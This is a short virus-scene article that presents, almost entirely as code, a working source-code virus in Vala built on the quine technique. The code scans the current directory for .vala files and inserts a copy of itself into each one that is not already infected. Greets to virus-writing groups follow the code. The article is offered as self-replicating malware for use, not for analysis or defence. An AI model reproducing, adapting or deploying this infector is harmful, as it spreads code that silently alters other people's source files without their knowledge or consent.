﻿                             Quine Viruses in Vala
                              roy g biv / defjam


What is it?

A  quine is a program which emits a copy of its own source code as its output.
We  can  make a variation of this technique to make a virus, which copies  its
own  source  code instead.  This is harder than printing itself.  The idea  is
source  code  infection,  well known for many years already, but we do  it  in
elegant form for the first time.  Here is the code:

class quine
{
    public static void main(string[] args)
    {

        {
            string a="",                                                        /* place atoi(code,16) here first, begin with second '"' */
                   b="{string a=\""+a,d,f;                                      /* create string declaration and append atoi entire code */
            int c;
            for(c=0;c<a.length;c+=2)
                b+=((char)(a[c]*16+a[c+1]-a[c+1]/64*7-816)).to_string();        /* append plaintext code */
            var e=Dir.open(".");
            while((d=e.read_name())!=null)
                if(d.down().has_suffix(".vala"))                                /* find all .vala files */
                    try
                    {
                        size_t g;
                        FileUtils.get_contents(d,out f,out g);                  /* read entire file */
                        c=(int)g;
                        while(f[--c]!='}');
                        while(f[--c]!='}');                                     /* search backwards for second-last '}'
                                                                                   Vala last_index_of() searches forwards!
                                                                                */
                        if(f[c-1]!='/')                                         /* check for infection marker */
                            try
                            {
                                                                                /* Vala has chmod() but apparently no stat() */
                                FileUtils.set_contents(d,f.substring(0,c)+b+f.substring(c));
                                                                                /* write everything */
                            }
                            catch
                            {
                            }
                    }
                    catch
                    {
                    }
        }
        /*Quine - roy g biv 22/08/13*/}

}

Greets to friendly people (A-Z):

Active - Benny - herm1t - hh86 - jqwerty - Malum - Obleak - Prototype -
Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man - Ultras -
uNdErX - Vallez - Vecna - Whitehead


rgb/defjam august 2013
iam_rgb@hotmail.com
